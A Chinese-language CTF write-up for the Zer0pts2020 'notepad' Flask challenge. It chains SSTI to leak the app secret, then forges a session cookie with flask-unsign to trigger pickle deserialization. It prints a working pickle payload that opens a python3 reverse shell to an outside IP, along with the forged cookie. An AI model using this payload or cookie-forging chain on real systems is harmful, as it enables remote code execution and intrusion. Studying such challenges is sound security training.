web | [Zer0pts2020]notepad
参考guoke师傅的文章:https://guokeya.github.io/post/3kK-0Vkzq/
主要是ssti+pickle反序列化。
首先通过ssti拿到flask的secret。
之后通过伪造jwt的方式进行pickle反序列化的利用。
生成pickle,这里我使用的是python3来反弹shell,flask肯定有这个环境,比较方便:
但是值得注意的是,在windows上和linux上pickle的结果是不一样的
import pickle
import base64
import os
class Person(object):
def __reduce__(self):
return (os.system,("python3 -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('43.142.193.63',9996));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);\"",))
admin=Person()
print(base64.b64encode(pickle.dumps(admin)))
然后使用flask-unsign工具进行重签名:
flask-unsign -s -S "b'\x84\x8f\xce\xe0+\xa0\xda\xfd*\x81\xa8ctY\x91\xb7'" -c "{'savedata':b'gASVAQEAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjOZweXRob24zIC1jICJpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgnNDMuMTQyLjE5My42MycsOTk5NikpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk7IpSFlFKULg=='}"
得到结果如下:
.eJwlkMuOmzAARX-l4gtsXKrOLFMegY6dYPzA7OwYiWBDycAkhNH8e6m6uIu7uEdH9zOY9b21etHB62fwzQSvQQNSJlxKKU8P5f_EjBeqHJseDw9gEo9oiDdznByFzd6ns5DTWY7Wy7S4qz4HrfMxllNRgumhfPfLDuSDS9vj3t8UKyRO1pz1aWNcEam-OJkMb6wmVwwAUujP2g75k42FlmkK1ZZHekieoj-8VUkUSlYAk9GY8KIysf8tskUKvvPGpsEjnZsEQ5GWD-ZWhXkkhFxk6SnTm-1bJm67H7RiqtnOK0P7wRwllkPOa4-145DVDmAHI4XIWWQzZIN_vyQ_n6d6wkbkqwK0MCGJiISdQN2sBvDdgIVZZN_EkYyqJ2Tn52K0RMvuB8ugvmTFUYzi2kr7YAlNL8lL9O_P3ee9SbtDy5ec1UIbuW7SX6B1S6wR2fczUqDc_6B1NdreMH-Tvju1bl3Y0F0psneBfG-9X8xRYAyiezV6ZNxa6zBSPJxRVR8YHdasggI3G3gJvr7-AlOpqeE.ZJ08-Q.2eFPuQHyrqF18zaObRGgsw0eBSA
直接打就能反弹shell了(guoke师傅我的超人!)。
标签:web,socket,flask,os,notepad,Zer0pts2020,import,pickle From: https://www.cnblogs.com/Mz1-rc/p/17514513.html